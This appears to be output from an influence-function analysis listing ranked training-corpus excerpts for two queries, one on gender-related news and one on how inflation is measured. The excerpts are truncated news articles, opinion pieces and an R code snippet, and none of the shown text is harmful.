text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 92; Score = 313344.0 +<|begin_of_text|>Transgender women are "not women", Australian-born academic and writer Germaine Greer has said. + +Her comments were made in response to a petition asking Cardiff University to cancel the author's lecture. + +Ms Greer is due to speak in a lecture called Women & Power: The Lessons of the 20th Century. + +Students' union women's officer Rachel Melhuish said Ms Greer's views towards transgender women are "misogynistic". + +By Friday, more than 200 people had signed an online petition calling for the university not to host the lecture, which is an annual event in memory of former deputy vice-chancellor Hadyn Ellis, who died in 2006. + +'Hateful comments' + +Ms Greer told BBC News: "I was going to talk about women and power... because I think there is a lot of triumphalist talk that masks the real historic situation. + +"And apparently people have decided that because I don't think that post-operative transgender men... are women I'm not to be allowed to talk." + +She also claimed that "a great many women" who are not transgender think transgender women - who she refers to as "male to female transgender people" - do not "look like, sound like or behave like women". + +Ms Greer did say she would be prepared to use female pronouns when referring to someone, if that was their preference, "as a courtesy". + +Media playback is unsupported on your device Media caption Germaine Greer has said that in her opinion transgender women are "not women" + +On Friday, the university's vice-chancellor Prof Colin Riordan said it does not condone "discriminatory comments of any kind". + +"At Cardiff University we work hard to provide a positive and welcoming space for LGBT+ people and we are in consultation with student and staff groups to ensure that the views of LGBT+ people are represented at our events", he said. + +While the statement on the petition web page does not cite examples of Ms Greer's alleged anti-transgender views, it accuses her of "continually misgendering trans women and denying the existence of transphobia altogether".<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 93; Score = 311296.0 +<|begin_of_text|>Experts say it's vastly under reported and often overlooked, but millions of men are victims of human trafficking world-wide. + +A report from the National Human Trafficking Hotline showed which country they were most likely to be found in 2016--the United States. + +It also found that 58 percent of male trafficking victims were used for forced labor, in industries spanning from agriculture and forestry to hotels and restaurants. + +But, Ashley Cruz at the Rape Crisis Center told ABC15 that getting men to speak out about their situations like trafficking, domestic violence, or sexual assault is harder, even if she and her staff have resources available specifically for them. + +"You have to be strong, you have to be aggressive, you can't fall victim to manipulation, coercion, or just straight fear. It's not allowed for males," Cruz said, while telling us that world-wide, 45 percent of all trafficking victims are male. + +Cruz introduced us to her husband, a Brazilian jujitsu fighter and teacher. The couple helped a friend of the husband's after the friend was brought to the US to teach jujitsu classes, and never paid the money he was promised. + +"The salary never came, and he was never put in a better place to sleep. He was taking showers in other gyms," Elton Hoshihara Cruz recalled. + +He said human trafficking is common in the Brazilian jujitsu industry. + +Ashley Cruz said human trafficking is on the rise for both men and women, explaining that it's on pace to overtake the drug trafficking industry within 5 years. + +If you are a victim of domestic violence, sexual assault, or human trafficking and need help, please call the Rape Crisis Center at 843-448-7273 (Horry County) or 843-545-5198 (Georgetown County). + +National Human Trafficking Resource Center Hotline: 888-373-7888 + +National Domestic Violence Hotline: 800-799-7233<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 94; Score = 309248.0 +<|begin_of_text|>We’ve all heard about the gender gap in tech. Women simply aren’t thriving in one of the most promising fields in the United States — and not for lack of talent. And here’s the truth: It’s not solely a problem for women. It’s a problem for men, too. In just five years, there will be a million unfilled computer science–related jobs in the United States, which according to our calculations could amount to a $500 billion opportunity cost. Tech companies are producing jobs three times faster than the U.S. is producing computer scientists. There are incredible opportunities here. We need women to help fill these jobs, and we need them now. + +The reasons why women and people of color are not pursuing computer science jobs are complicated. I’ve thought a lot about this over the past 16 months, as I’ve directed my documentary on the subject, Code: Debugging the Gender Gap, and I believe there are four main reasons women don’t thrive in tech. Here they are: + +1. Culture + +First and foremost, this is a culture problem. The stereotype of a software engineer is a 25-year-old, hoodie-clad dude who wears glasses, is antisocial, and loves to hack strings of code in the basement of his parents’ home, eating stale pizza and drinking Red Bull until 3 or 4am. As with all stereotypes, there’s some truth here, and it’s not the most aspirational image for a young woman. Old movies like War Games contributed to the stereotype, while the image of the male geek genius is perpetuated in modern pop culture with television shows such as HBO’s Silicon Valley and The Big Bang Theory. + +2. Few role models + +Which leads me to another huge reason we have a gender imbalance: Tech is basically devoid of female role models. The old adage “You cannot be what you cannot see” is true here. Young girls and people of color have very few modern-day role models in tech. Megan Smith is the Chief Technology Officer of the United States, but she’s hardly a household name. We need more modern-day female role models, many more. + +3. Poor pipeline + +At most universities, few women make it past the 101, entry-level computer science class that should welcome all students, regardless of their prior knowledge of the subject. Instead, women entering this first-year class too often suffer from negative ambient belonging. From the first day there, they perceive that the men in the class know much more about programming than they do. And they are +================================================================================ +Rank = 95; Score = 305152.0 +<|begin_of_text|>Previous studies have shown that men find female faces more attractive when the women are ovulating, but the visual clues that allow this are unclear. Now, new research investigating whether it might be to do with subtle changes in skin colour has shown that women’s faces do increase in redness during ovulation, but the levels of change are just under the detectable range of the human eye. + +Researchers say this may mean that facial redness in females was once an involuntary signal for optimal fertility, but has since been “dampened” by evolution as it is more beneficial for females to hide or control outward signs of peak fertility. + +Involuntarily signalling ovulation can prevent longer-term investment from males. In primate species that advertise ovulation, males only express sexual interest in females when they appear to be fertile. In humans, ovulation is less conspicuous and sexual behaviour is not restricted to the period of peak fertility. + +The research, published today in the open-access journal PLOS ONE, is the most complete objective study of female faces during the ovulatory cycle, say researchers. Twenty-two women were photographed without make-up at the same time every working day for at least one month in the same environment and using a scientific camera modified to more accurately capture colour (usually used for studying camouflage in wildlife). + +A computer programme was designed to select an identical patch of cheek from each photograph. The participants also self-tested for hormone changes at key times dictated by the research team’s “period maths”. + +A surge in luteinising hormone told researchers that ovulation would occur in roughly the next 24 hours, so they knew which photographs were taken when the women were most fertile. The team converted the imagery into red/green/blue (RGB) values to measure colour levels and changes. + +They found that redness varied significantly across the ovulatory cycle, peaking at ovulation and remaining high during the latter stages of the cycle after oestrogen levels have fallen. Skin redness then dips considerably once menstruation begins. The research suggests facial redness closely maps fluctuations in body temperature during the cycle. + +However, when running the results through models of human visual perception, the average difference in redness was 0.6 units. A change of 2.2 units are needed to be detectable to the naked human eye. + +“Women don’t advertise ovulation, but they do seem to leak information about it, as studies have shown they are seen as more attractive by men when ovulating,” said Dr Hannah Rowland, from the University of Cambridge’s Zo +================================================================================ +Rank = 96; Score = 303104.0 +<|begin_of_text|>Image caption Commemoration events will take place to celebrate the life and achievements of Dr Inglis + +When Elsie Inglis asked the War Office if female doctors and surgeons could serve in front-line hospitals in World War One she was told'my good lady, go home and sit still'. + +Elsie, a pioneering Edinburgh doctor who had already become well-known as a champion of women's health, did the opposite. + +Instead, she formed the Scottish Women's Hospitals - all female units that provided support for Britain's allies, the French, the Belgians and especially the Serbs. + +Elsie was 50 when war broke out and had already made a mark in Edinburgh by working with women and babies in the poorest parts of the city. + +Image caption War medals belonging to Dr Inglis have been displayed in Edinburgh + +She was also a prominent campaigner for votes for women and it was through the suffrage movement that she began to raise money to send out female doctors, nurses, orderlies and drivers to the front line. + +Elsie raised the equivalent of £53m in today's money and over the course of the war set up 14 hospitals, staffed by 1,500 women who volunteered from all over Scotland, and later from New Zealand, Australia and Canada. + +These woman were often unmarried and wanted to prove their independence and capability on the front line. + +They worked in dire conditions to treat hundreds of thousands of injured men during the bloody conflict. + +'Horrendous conditions' + +Within months of the outbreak of war she had started a hospital in the north of France and field hospitals were set up close to battlefields across Europe including, in particular, Serbia. + +Writer and researcher Louise Miller said the Balkan country was devastated by the war when, as well as being invaded, it was gripped by a typhus epidemic. In total, it lost about 16% of its population. + +"Serbs needed any competent help they could get. They didn't care about the form it took: male, female, young, old - anybody," she said. + +The first Scottish Women's Hospital field unit was formed in December 1914 in a town called Kragujevac in Serbia. + +According to historian Alan Cumming, who has done much to resurrect Elsie's memory, the conditions were "horrendous". + +Image copyright Andrew Cowan Image caption Dr Elsie Inglis was told that the need for help in Serbia was "very pressing" + +He says the typhus epidemic meant Serbia "was on +================================================================================ +Rank = 97; Score = 303104.0 +<|begin_of_text|>Prostitutes are penis experts. There is no other group of professionals – not scientists, not academic researchers, not journalists – that have more experience viewing and handling a large number and wide variety of penises. Additionally, prostitutes are probably the only professional group qualified to comment on how penises of differing sizes and shapes feel when they are inside a woman. + +It seems like every month another article about the latest penis size study is published. It’s a popular media topic because men are becoming increasingly obsessed with the size of their genitals, thanks in part to the wide availability of online porn showing women writhing in pleasure as they receive a plunging from one large penis after another. + +There is a lot of speculation about what the perfect penis is supposed to look like, how long or wide it needs to be in order to deliver pleasure, and what’s considered “ideal.” I decided to share my informed opinion as a licensed Nevada prostitute and write about certain myths that many people tend to believe, either due to lack of sexual experience or a limited exposure to all of the various penis shapes and sizes. Below are what I consider to be the three most common myths about penis size. + +Myth #1: There is such a thing as an “ideal” penis size + +I’ve seen a lot of cocks. They come in all shapes, lengths, widths, and colors. Some bend upwards, some downwards, some curve to the side. Some are almost the size of my forearm, some the size of my thumb. I’ve seen penises with a sharp bend like a water faucet, and penises shaped like a mushroom, with a large head on a smaller shaft. While some online resources will try to trick people into believing that there is such a thing as an “ideal penis,” I’m here to tell you that as long as your penis is healthy, it’s ideal for sex and is capable of pleasing a woman. + +There are so many ways that one healthy penis can differ from the next, that it’s pointless to try to figure out what’s “normal” or “ideal.” Sure, you can go on Wikipedia, read that the average penis length is 5.17 inches, get an idea as to how you measure up against this average, and feel better (or worse) about yourself. But comparing yourself to a statistical average or striving for an ideal will not only give you a false perception of the wonderful diversity of healthy penises, but also impair your ability to see yourself as a valuable individual who uses your unique body to be the best +================================================================================ +Rank = 98; Score = 303104.0 +<|begin_of_text|>Image caption Despite having the same qualifications as men, recent women graduates earn less, suggests a study + +Female graduates earn thousands of pounds less than their male counterparts, according to a report. + +The pay gap persists even between men and women from the same types of university who studied the same subjects, suggests the study. + +Researchers for the Higher Education Careers Services Unit (Hecsu) analysed how much students who applied to higher education in 2006, earned last year. + +Jane Artess, of Hecsu, said pay distribution was "strikingly uneven". + +This was despite laws designed to ensure equal access to jobs and pay, said Ms Artess, + +The researchers analysed data from a longitudinal study of 17,000 recent graduates called Futuretrack. They found that the take-home pay of more than half of female graduates ranged between £15,000 and £23,999. + +Male lead + +Men were more likely to take home £24,000 and above, they found. + +The analysis did not include part-time workers or the unemployed. + +The data, published in the Hecsu journal Graduate Market Trends, suggested men earned more than women across all degree subject areas, even if more women took those subjects than men. + +"When graduate earnings are examined by subject, it is clear that women earned less than men who studied the same subject," says the article. + +The authors add this is the case across all subject areas, "even where women's participation is greater than men's". + +"Equal opportunity to access jobs and pay has been enshrined in legislation for 40 years, yet Futuretrack found that being female can make a difference to a graduate's earning power", said Ms Artess. + +"It is difficult to see why this is, for example, female graduates of media-related subjects are no more or less numerous than their male counterparts yet their earnings are typically lower. + +"Of the Futuretrack respondents, there were fewer men than women in law, yet there is an even greater male lead on earnings. + +"Since it would be unlawful for employers to pay males and females doing the same job differently, something else must be happening to female graduate earnings. + +"If we look at wages by sector, the male lead is persistent in the public and private sectors, in graduate workplaces and also in graduate and non-graduate job roles. + +"The only area where female pay is equal to males is in the not-for-profit sector," said Ms Artess. + +Trades Union Congress (TUC) general secretary Frances O'Grady described the findings as "very alarming." + +Motherhood +================================================================================ +Rank = 99; Score = 301056.0 +<|begin_of_text|>On the right track: DfT appoints two women to directors general job share for Rail Group. Credit: Lynne Cameron/PA + +The Department for Transport has appointed two women to the civil service's first ever job share at director general level as successors to the DfT's newly appointed permanent secretary. + +Polly Payne and Ruth Hannant will join the DfT as directors general for the department's Rail Group on 11 December from the Department for Education, filling the position left vacant when Bernadette Kelly was promoted to perm sec in April. + +Kelly said the pair would be role models not only for the civil service but also for the rail sector, where women make up just 11% of the workforce and senior leaders are "overwhelmingly male". + +RELATED CONTENT + +She told Civil Service World: “I’m proud that the Department for Transport is leading the way with the first job share partnership at this level in government. And I’m especially pleased that we have Polly and Ruth joining us to lead our work on rail. + +"We are investing in the biggest rail modernisation for over a century, so there’s a huge amount to do." + +Kelly was DG for Rail Group from September 2015 to April 2017, when Nick Joyce took the post in an "acting" capacity. + +Rail Group is responsible for developing strategy and policy for the rail sector, managing expenditure on rail services and infrastructure, and oversees the delivery of rail franchises and major projects – including Crossrail and Thameslink. + +It sponsors British Transport Police, Network Rail, the Office of Rail and Road, the Rail Accidents Investigation Branch and Transport Focus. + +Payne and Hannant were already in a job-share partnership with each other working on higher education reform in DfE, and have both previously worked for the former Department for Business, Innovation and Skills and theTreasury. Former BIS permanent secretary Martin Donnelly described the pair as an "outstandingly effective job share", during an interview with Civil Service World earlier this year. + +DfT said the appointment demonstrated the government's commitment to increasing the number of women working in the rail sector. The Transport Infrastructure Skills Strategy, published in 2015, included an aim for women to make up 20% of DfT's science and technical apprenticeships by 2020, and 50% by 2030. + +Kelly added: “Within the DfT we are making progress in encouraging diversity at every level, and earlier this year the department was recognised for our leadership on workplace gender equality by diff --git a/examples/openwebtext/files/scores_raw_margin/factor_arguments.json b/examples/openwebtext/files/scores_raw_margin/factor_arguments.json new file mode 100644 index 0000000..75f4a1f --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/factor_arguments.json @@ -0,0 +1,20 @@ +{ + "strategy": "ekfac", + "use_empirical_fisher": false, + "amp_dtype": "torch.bfloat16", + "amp_scale": 65536.0, + "has_shared_parameters": false, + "covariance_max_examples": 100000, + "covariance_data_partitions": 4, + "covariance_module_partitions": 2, + "activation_covariance_dtype": "torch.bfloat16", + "gradient_covariance_dtype": "torch.bfloat16", + "eigendecomposition_dtype": "torch.float64", + "lambda_max_examples": 100000, + "lambda_data_partitions": 4, + "lambda_module_partitions": 4, + "use_iterative_lambda_aggregation": true, + "offload_activations_to_cpu": true, + "per_sample_gradient_dtype": "torch.bfloat16", + "lambda_dtype": "torch.bfloat16" +} \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw_margin/inflation.txt b/examples/openwebtext/files/scores_raw_margin/inflation.txt new file mode 100644 index 0000000..f28b009 --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/inflation.txt @@ -0,0 +1,2022 @@ +Query Sequence: +Prompt:Inflation is typically measured by; Completion: the Consumer Price Index (CPI). + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 8781824.0 +<|begin_of_text|>India's inflation rate has slumped to the lowest level of modern times and there is much talk that the Reserve Bank of India will lower interest rates to stimulate the economy--that might take a little longer than many are predicting. We must always distinguish between general inflation, a general upward pressure on the price level, and specific price changes. This current low inflation rate looks much more like the effect of the latter, thus interest rate changes aren't so warranted. + +Growth in industrial production fell to a three-month low in May while consumer price index (CPI)-based inflation declined below a stipulated floor of 2 per cent in June, providing the Reserve Bank of India leeway to cut the policy interest rate in August. + +The RBI certainly has the power and the room to cut rates, yes, but that's not quite the correct policy decision here. Which is whether the RBI should cut interest rates as a result of the low inflation and that's much less certain: + +Data released by the Central Statistics Office (CSO) on Wednesday showed retail inflation, as measured by the consumer price index (CPI), rose an annual 1.5% in June, slower than previous month's 2.2%. This was the slowest pace of increase since the government unveiled the new retail inflation series in 2012. The previous lows were in 1999 and in 1978 under a different series. + +My point being that CPI isn't really the correct inflation measure to be using when considering interest rate changes and inflation. The US Federal Reserve, for example, uses the PCE rate although that's not really the important point here. CPI, PCE, RPI, they all have their slight differences and are useful in slightly different manners. But there's a much more important difference we need to take account of: + +Aside from the steep fall in food inflation, which has been downplayed by the RBI time and again, the steady and consistent fall in core inflation (non-food and fuel) could find favour with the central bank. + +It's this difference between core and non-core inflation that matters. It does depend upon which government and which statistical system we're talking about as to whether all produce core and non-core PCE and RPI and CPI, but in general the distinction is understood between the two different types of inflation rate: + +Data on Wednesday showed headline consumer price inflation fell to 1.5 percent in the year to June from an annual 2.2 percent a month ago and below forecasts for a 1.6 percent reading +================================================================================ +Rank = 1; Score = 7372800.0 +<|begin_of_text|>Russia's Consumer Price Index (CPI) in October fell again to an extraordinary low of 2.7% year-on-year down from the already low 3% seen in September, Rosstat statistics agency said on November 7. + +Inflation has strongly overshooting the Central Bank of Russia (CBR) target of 4% set for 2017, diving from double-digit price growth in less than two years. + +However, the CBR keeps pointing to stubborn inflationary expectations and other medium-terms inflationary risks and sticks to the moderately tight monetary policy despite the pressure from the government to support growth with lower interest. The current rate is by far the lowest in post-Soviet history but the population remain stubbornly convinced that the fall is temporary, according to the CBR surveys. The result is inflationary pressure remains lurking and the CBR is reluctant to accelerate rate cuts until the population expectations of price rises relent. + +The CBR decided to cut the key interest rate by 25bp at the board of directors meeting on October 27, in line with the expectations. + +A more aggressive cut of 50bp would have meant that the CBR could prepare to tighten the policy again in the beginning of 2018, some analysts suggested. However, the CBR decided to abstain from an aggressive move and cut the rate by the minimum step of 25bp to 8.25%. + +Last week Alfa Bank argued that "at the moment we do not agree with the government’s concerns that low inflation is the result of the tight monetary policy of the CBR." + +The analysts that forecasted inflation easing to 2.8% in October maintained that "medium-term inflationary risks are considerable and that the CBR should thus not accelerate interest rate cuts." + +However, VTB Capital previously argued that "the incoming data for October and November might nudge the Board to opt for a more ambitious cut of 50bp," while noting that "this would call for surprises from inflation reports, banking stats and economic activity data to combine into a convincing case." + +The CBR expects inflation to end 2017 at 3.5-3.8%, while the Ministry of Economic Development that needs lower interest rates to help its ambitious 2.1% growth outlook expects 2.7-3.2% inflation in 2017.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 2; Score = 6651904.0 +<|begin_of_text|>You can download session 9 files here (R-Ladies Tbilisi) and specify your working directory with setwd(“/Users/mydomain/myforlder/) + +BAR CHART + LINE: + +###Graph 1: Total services trade, by value + +require(ggplot2) require(dplyr) mypath <- "/Users/StayPuftMarshmallowMan/Shandor Folder/" setwd(paste(mypath)) mydt <- read.csv("Georgia_Data_UN.csv", header=T) head(mydt) + +## variable type year value ## 1 GDP: Gross domestic product (million current US$) economic 2014 16530.0 ## 2 GDP: Gross domestic product (million current US$) economic 2010 11638.0 ## 3 GDP: Gross domestic product (million current US$) economic 2005 6411.0 ## 4 GDP growth rate (annual %, const. 2005 prices) economic 2014 4.8 ## 5 GDP growth rate (annual %, const. 2005 prices) economic 2010 6.2 ## 6 GDP growth rate (annual %, const. 2005 prices) economic 2005 9.6 ## geo ## 1 ## 2 ## 3 ## 4 ## 5 ## 6 + +levels(mydt$variable) + +## [1] "Agricultural production index (2004-2006=100)" ## [2] "Balance (million US$)" ## [3] "Balance of payments, current account (million US$)" ## [4] "CO2 emission estimates (tons per capita)" ## [5] "CPI: Consumer price index (2000=100)" ## [6] "Economy: Agriculture (% of GVA)" ## [7] "Economy: Industry (% of GVA)" ## [8] "Economy: Services and other activity (% of GVA)" ## [9] "Education: Government expenditure (% of GDP)" ## [10] "Education: Tertiary gross enrolment ratio (f-m per 100 pop.)" [...] ## [48] "Unemployment (% of labour force)" ## [49] "Urban population (%)" ## [50] "Urban population growth rate (average annual %)" + +ser.dt <- mydt %>% filter(variable=="Total Services Trade") Balance <- ser.dt%>% group_by(year)%>% summarise(value=-diff(value)) Balance <- cbind(variable +================================================================================ +Rank = 3; Score = 6389760.0 +<|begin_of_text|>The government has admitted that 800,000 more households stand to lose out under its flagship welfare scheme than previously thought. + +In a revised impact assessment of its universal credit scheme, which will replace six of the seven main means-tested benefits and tax credits for those of working age, the Department of Work and Pensions (DWP) says that 2.8 million households will get a lower entitlement to benefits. That compares with a figure of 2 million announced in October 2011 after officials first considered how the changes would affect claimants. + +The sums are large. About 800,000 households will see an average loss of £137 a month, while the 300,000 hardest hit families will lose as much as £300 a month. About 200,000 lone parents will also receive lower awards under the new scheme than the current system. + +The much greater impact is due to a combination of factors – the deteriorating economic environment appears to have added £700m to the costs of the policy according to the Office for Budget Responsibility, while officials also concede that universal credit is less generous than first envisaged. The chancellor's decision last week to raise benefits at a rate lower than the consumer price index will also have affected the scheme. + +The revised impact assessment was released late on Tuesday. Ellen Broome, policy director at the Children's Society, said: "We have some serious concerns about how it will affect some of the most disadvantaged children and families. Some of our poorest working families will struggle to afford vital childcare. Our evidence also reveals that many disabled children and disabled lone parents will be significantly worse off." + +Labour also questioned whether there were not dwindling savings from the scheme, pointing out that the 2011 impact assessment claimed that universal credit would reduce administrative costs by £500m due to its "reduced complexity". This, says the opposition, has been revised downwards to £200m. + +Liam Byrne, the shadow work and pensions secretary, said: "Universal credit is now set to be a car crash for 2.8 million families who will be worse off than under the current system. That's nearly 50% more than when plans were first published." + +"The very people this government has let down are being asked to pick up the tab for ministers' failure. 300,000 families on middle and modest incomes will lose £3,600 a year – that's £300 a month. We were promised a welfare revolution but universal credit is descending into universal chaos. Instead of fixing welfare reform, this government is now just +================================================================================ +Rank = 4; Score = 4751360.0 +<|begin_of_text|>WASHINGTON (Reuters) - Both President Barack Obama and Republicans in the U.S. House of Representatives have made opening offers in negotiations to resolve the “fiscal cliff. + +Here is a look at the two proposals, which are aimed at averting a more drastic combination of tax increases and spending cuts that economists say could cause a recession: + +REPUBLICAN OFFER + +House Republican leaders on Monday called for $2.2 trillion in new deficit reductions over 10 years. + +When counting deficit reductions enacted last year, anticipated savings from winding down the wars in Iraq and Afghanistan and some interest savings, the package would amount to $4.6 trillion in reductions over a decade, according to House Republicans. + +The offer made the following proposals to achieve $2.2 trillion in new deficit reductions over 10 years: + +* $800 billion in new revenue through tax reform; + +* unspecified healthcare program savings of $600 billion; + +* other savings from changes to unspecified mandatory spending programs of $300 billion; + +* tying cost-of-living increases for federal benefit programs to the Consumer Price Index to get savings of $200 billion; + +* and further unspecified savings to domestic spending programs of $300 billion. + +House Speaker John Boehner of Ohio and six other House Republican leaders made the offer on Monday in a letter to Obama. + +DEMOCRATIC OFFER + +The White House on Thursday proposed raising tax revenues by nearly $1.6 trillion, in line with what Obama has said is needed for long-term deficit reduction of nearly $4.4 trillion over 10 years. + +The administration also sought $200 billion in economic stimulus from a combination of investments including infrastructure spending, extension of a payroll tax cut and jobless benefits. + +The White House would also continue individual income tax cuts from the administration of former Republican President George W. Bush for all but the wealthiest earners. + +Obama’s negotiators also sought the ability to raise the nation’s borrowing limit unilaterally. At present, Congress must approve an increase in the debt ceiling. + +The administration’s proposal would delay across-the-board spending cuts for a year. In exchange the administration agreed to make $600 billion in spending cuts to entitlement 